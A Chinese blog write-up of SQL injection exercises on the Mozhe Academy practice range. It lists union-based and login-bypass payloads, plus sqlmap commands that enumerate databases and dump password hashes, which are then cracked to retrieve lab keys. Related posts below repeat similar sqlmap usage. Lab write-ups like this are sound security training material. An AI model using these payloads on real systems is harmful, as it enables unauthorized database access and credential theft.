墨者学院打靶练习

最新推荐文章于 2024-09-10 17:41:54 发布
最新推荐文章于 2024-09-10 17:41:54 发布
阅读量360 收藏 4
点赞数 4
文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69602647/article/details/140617014
版权

SQL注入漏洞测试(POST)

靶场页面:

使用BP抓包:

post注入尝试

使用 ' union select 1,2,3# 成功拿到key

SQL手工注入漏洞测试(Db2数据库)

这里选择使用sqlmap

点击这里有注入点:

python3 sqlmap.py -u "http://ip:40880/new_list.php?id=1" --dbs --batch

出库名:

查看表名:

python3 sqlmap.py -u "http://ip:40880/new_list.php?id=1" -D DB2INST1 --tables --batch

查看GAME_CHARACTER:

python3 sqlmap.py -u "http://ip:40880/new_list.php?id=1" -D DB2INST1 -T GAME_CHARACTER --columns --batch

发现只有ID 其他数据被隐藏了,这里咱们猜测password

python3 sqlmap.py -u "http://ip:40880/new_list.php?id=1" -D DB2INST1 -T GAME_CHARACTER -C password --dump --batch

最终获得两个md5加密的密码:

尝试md5解密:

然后登录获取key:mozhe/643020

SQL注入漏洞测试(登录绕过)

一个简易登录框:

sql万能账户:admin' or 1=1# 密码随意

获取key:

SQL手工注入漏洞测试(MySQL数据库)

还是一样 点击:

这里使用hackBar插件手工注入:

?id=1 and 1=1

?id=1 and 1=2

数字型

查看字段数:

?id=1 order by 4

查看回显:

查看库名:

查看表名:

查看列名:

查看内容:

?id=-1 union select 1,group_concat(id,name,password,status),3,4 from StormGroup_member

md5解密:

登录获取key

雾魈
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
墨者学院靶场练习
cndydmz的博客
12-06 1308
1.SQL注入漏洞测试(布尔盲注) 首先进入靶场, 然后点击上图通知,进入 然后打开sqlmap 输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名 得到数据库名为stormgroup 然后输入sqlmap -u http://219.153.49.228:45907/new_list.php...
墨者学院 靶场练习(一) SQL注入
a519395243的博客
12-20 8078
墨者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_42357070/article/details/81215715   进来点击公告   sqlmap 用于 mysql注入的步骤: 1:查找数据库 ./sqlmap.py ...
墨者学院SQL靶场练习
lhdbk______的博客
07-22 602
墨者学院靶场训练
墨者学院—HTTP动作练习
rumil的博客
07-20 360
发现数据包当中为GET请求,而且参数值过于长,所以我们将请求改为POST请求,然后将content参数值放在请求体当中,放包即可。将此数据包再次和GET请求数据包进行对比,发现info.php文件,再次修改添加即可。将刚刚获取的content参数值(重发器当中)复制到这里来,在重发器当中测试。根据题目分析,然后再次点击静夜思,bp抓包即可。我们正常的点击静夜思,给与我们网页提示信息。发现请求,正常响应成功,源码也呈现出来。并没到得到我们想要的结果,继续分析。再次发送,即可成功获取key。
墨者学院 在线靶场 HTTP动作练习
weixin_60937978的博客
04-21 287
抓包 把GET改成POST,把中间的content剪切到末尾,去掉问号 bug zh 正确答案
墨者学院SQL手工注入靶场漏洞详解
sone_yoonyul的博客
07-07 1463
墨者学院SQL手工注入靶场漏洞详解目录靶场地址步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师“墨者”所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币(注册的时候会送十几个墨币并且不会重复消耗,只需要尽情练习即可),靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 步骤详解 观察首页,是否有注入入口 表单处无法进行注入,这时可以发现滚动栏有个通知,点开之后发现这是一
墨者学院SQL注入
2401_86440467的博客
07-25 439
进行布尔判断,添加语句and 1=1,页面显示正常,添加语句and 1=2,页面显示出错。证明存在sql注入。
墨者学院在线靶场writeup
john_david_的博客
02-14 5214
入门 WEB页面源代码查看 打开是一个HTML页面,鼠标右键被禁用,直接F12,控制台点Elements看源代码,就发现key了 WEB页面分析 打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key 服务器返回数据查看 F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key 浏览器信息伪造...
墨者学院——登录密码重置漏洞分析溯源
人若无名,便可专心练剑
10-07 207
抓包后,把17开头的电话号码改成了18开头的,然后获取验证码。发现没有验证码,所以要用18868345809拿验证。然后用17开头的电话号码重置,用18开头的验证码。先用17101304128的进行抓包。进行重置密码,拿到key。
墨者学院-在线靶场
weixin_42730900的博客
02-23 4197
浏览器信息伪造 更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G ## 来源页伪造
墨者学院在线靶场WP
心想事成
12-22 858
我们知道 HTTP 连接基于 TCP 连接,HTTP 协议中没有 IP 的概念,Remote Address 来自 TCP 连接,表示与服务端建立 TCP 连接的设备 IP,在这个例子里就是 IP3。Remote Address 无法伪造,因为建立 TCP 连接需要三次握手,如果伪造了源 IP,无法建立 TCP 连接,更不会有后面的 HTTP 请求。可以看到,XFF 的内容由「英文逗号 + 空格」隔开的多个部分组成,最开始的是离服务端最远的设备 IP,然后是每一级代理设备的 IP。
NoSQL之 Redis配置与优化
最新发布
2201_75549363的博客
09-10 889
Redis(远程字典服务器) 是一个开源的、使用 C 语言编写的 NoSQL 数据库。Redis 基于内存运行并支持持久化,采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 341
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 330
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
被低估的SQL
weixin_61431494的博客
09-03 1526
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQL的高级查询练习知识点(day24)
新手小袁
09-05 1150
SQL的高级查询练习知识点,主要关于SQL练习题,适用于新手练习,主要简述基础查询,条件查询等知识点
SQL server 日常运维命令
2301_76664379的博客
09-10 1489
【代码】SQL server 日常运维命令。
sql 中使用like%、函数导致索引失效的解决方案
weixin_58691039的博客
09-06 810
sql 中使用like%、函数导致索引失效的解决方案全文索引与虚拟列索引
墨者学院sqlmap Host头注入
07-28
墨者学院SQLMap是一款常用的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。而Host头注入是一种特定类型的SQL注入攻击方法,攻击者通过修改HTTP请求头中的Host字段来执行恶意的SQL查询。 使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值